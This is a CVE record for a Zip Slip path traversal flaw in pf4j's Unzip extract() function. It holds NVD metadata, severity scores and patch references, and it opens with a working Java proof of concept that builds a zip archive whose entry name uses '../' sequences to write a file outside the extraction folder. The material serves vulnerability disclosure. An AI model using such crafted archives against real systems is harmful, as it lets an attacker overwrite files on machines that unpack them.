CVE-2025-70952

import java.io.*; import java.util.zip.*; public class ZipSlipPoC { public static void main(String[] args) throws IOException { // Create a malicious zip file String maliciousZipPath = "malicious.zip"; FileOutputStream fos = new FileOutputStream(maliciousZipPath); ZipOutputStream zos = new ZipOutputStream(fos); // The entry name contains '../' to traverse directories // This attempts to write 'evil.txt' to the parent directory of the extraction point String entryName = "../../../../tmp/evil.txt"; ZipEntry entry = new ZipEntry(entryName); zos.putNextEntry(entry); // Content of the malicious file String content = "This file was written via Zip Slip vulnerability."; zos.write(content.getBytes()); zos.closeEntry(); zos.close(); System.out.println("Malicious ZIP file created at: " + maliciousZipPath); } }

{"cve": {"id": "CVE-2025-70952", "sourceIdentifier": "[email protected]", "published": "2026-03-25T19:16:28.260", "lastModified": "2026-04-01T13:44:35.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pf4j before 20c2f80 has a path traversal vulnerability in the extract() function of Unzip.java, where improper handling of zip entry names can allow directory traversal or Zip Slip attacks, due to a lack of proper path normalization and validation."}, {"lang": "es", "value": "pf4j anterior a 20c2f80 tiene una vulnerabilidad de salto de ruta en la función extract() de Unzip.java, donde el manejo inadecuado de los nombres de las entradas zip puede permitir ataques de salto de directorio o Zip Slip, debido a la falta de una normalización y validación de ruta adecuadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pf4j_project:pf4j:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.14.1", "matchCriteriaId": "7857D4EE-9752-4195-80FF-87D2DE335A67"}]}]}], "references": [{"url": "https://gist.github.com/weaver4VD/410f23adb24ef5f5077f021f4393e705", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/pf4j/pf4j/commit/20c2f80089d1ea779e22c2de5f109a0bce4e1b14", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pf4j/pf4j/issues/618", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/pf4j/pf4j/issues/623", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}